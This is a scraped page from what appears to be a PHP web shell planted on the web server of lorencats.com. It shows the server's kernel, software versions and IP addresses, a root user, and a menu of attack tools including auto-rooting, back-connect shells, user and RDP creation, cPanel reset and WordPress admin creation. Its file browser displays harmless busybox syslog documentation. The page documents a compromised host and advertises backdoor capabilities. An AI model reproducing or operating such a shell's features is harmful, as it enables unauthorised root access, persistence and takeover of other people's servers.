Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
busybox /
[ HOME SHELL ]
Name
Size
Permission
Action
changelog.Debian.gz
20.52
KB
-rw-r--r--
copyright
1.08
KB
-rw-r--r--
mdev.txt.gz
2.39
KB
-rw-r--r--
syslog.conf.txt
1.35
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : syslog.conf.txt
If syslogd applet compiled with FEATURE_SYSLOGD_CFG=y, then it supports restricted syslog.conf. The config resembles rsyslog.conf in RULES part: LINE = DELIM [RULE | COMMENT] COMMENT = #.* DELIM = SPACE TAB RULE = SELECTOR [;SELECTOR]* DELIM* ACTION DELIM* SELECTOR = FACILITY [,FACILITY]* .[[!]=] PRIORITY FACILITY = * | kern | user ... (see syslog.h) PRIORITY = * | emerg | alert ... (see syslog.h) ACTION = FILE "mark" facility is NOT supported. "none" priority is supported. In FACILITY and PRIORITY "*" stands for "any". FILE is a regular file or tty device. Here is an example: #syslog.conf kern,user.* /var/log/messages #all messages of kern and user facilities kern.!err /var/log/critical #all messages of kern facility with priorities lower than err (warn, notice ...) *.*;auth,authpriv.none /var/log/noauth #all messages except ones with auth and authpriv facilities kern,user.*;kern.!=notice;*.err;syslog.none /var/log/OMG #some whicked rule just as an example =) *.* /dev/null #this prevents from logging to default log file (-O FILE or /var/log/messages) Even in the case of match with some rule another rules will be tried too. If there was no match with any of the rules, logging to default log file or shared memory will be performed.
Close